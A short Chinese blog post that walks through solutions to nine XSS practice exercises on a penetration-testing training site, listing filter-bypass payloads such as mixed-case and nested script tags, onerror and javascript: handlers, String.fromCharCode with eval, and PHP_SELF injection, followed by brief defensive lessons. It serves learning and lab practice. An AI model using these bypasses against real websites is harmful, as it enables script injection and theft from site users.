美文网首页
XSS 练习

XSS 练习

作者: Amrzs | 来源:发表于2014-06-14 16:49 被阅读1524次

XSS 练习

from my wp blog

一个不错的网站,不错的渗透教程

虽然是很基础的东西,但是涵盖了好多知识

9道XSS练习题

解题过程

url参数直接写进html里面

?name=<script>alert(1)</script>
若果过滤<script></script>
不妨<sCript></sCript>
全过滤则是Pentest<script>erLab显示PentesterLab
则是<scrip<script>t>alert(1)</scrip</script>t>
若果怎样的<script>都不管用了,制造一堆事件
<a href=’javascript:alert(1)’
<img src=’zzzz’ onerror=’alert(1)’ />.
onmouseout, onmousemove….
alter被过滤
用 eval 和 String.fromCharCode()
把ascii数字转成字符再执行,可以获得alert(1)
prompt 和 confirm也是弹窗
若果?name=的值是写入<script></script>里面的,比如var s=””
那就在?name=“;alert(1);”,把东西写到双引号直接,注意每句结尾的分号
hp会把输出的内容html编码,htmlentities,<,>,,但是单引号’不在内
有些post提交表单是使用PHP_SELF,那么action的值就是url
这样修改url,../example8.php/><script>alert(0)</script><好了
面对静态文件,不要慌,看看里面的js怎么写的
js对url进行操作,写进html里,那就改url
把<script>嵌进里面</script>

小结

  • 不能把url的东西往html里面写
  • 表单的提交数据和各种url需要过滤

相关文章

  • XSS 练习

    XSS 练习 from my wp blog 一个不错的网站,不错的渗透教程 虽然是很基础的东西,但是涵盖了好多知...

  • 构造个人轻量级XSS平台获取管理员cookie并登录

    构造个人轻量级XSS平台获取管理员cookie并登录 一、前言 本平台是个人轻量级XSS测试平台,仅作为练习参考。...

  • 跨站攻击脚本-XSS

    XSS: Cross Site Scripting XSS 概念 XSS 分类 反射型xss攻击图示 XSS 攻击...

  • XSS payload.

    alert('XSS') alert("XSS") alert('XSS') alert("XSS") S...

  • test

    alert('xss')alert('xss') alert('xss')

  • Django中xss和静态文件的引用(十二)

    一、xss(跨域脚本攻击)的基本介绍 1、xss分类: 反射型xss 存储型xss 2、xss的概念 XSS攻击全...

  • XSS--LOG-1

    XSS总结: xss分为三种,反射型xss,DOM型XSS及存储型XSS,不同类型的XSS的危害不同,有兴趣的...

  • XSS学习之xss20

    前言 这是比较简单的xss练习小游戏,非常适合入门。一直以来,对xss的内容总感觉有一些屏障,应该是因为动手实践太...

  • 第三章 XSS 攻击

    要点 XSS 攻击 XSS 防护 一、 XSS攻击 XSS攻击 (Cross-Site Scripting,跨站脚...

  • XSS 与 CSRF 两种跨站攻击

    XSS XSS:跨站脚本(Cross-site scripting) XSS:脚本中的不速之客 XSS 全称“跨站...

网友评论

      本文标题:XSS 练习

      本文链接:https://www.haomeiwen.com/subject/njqjtttx.html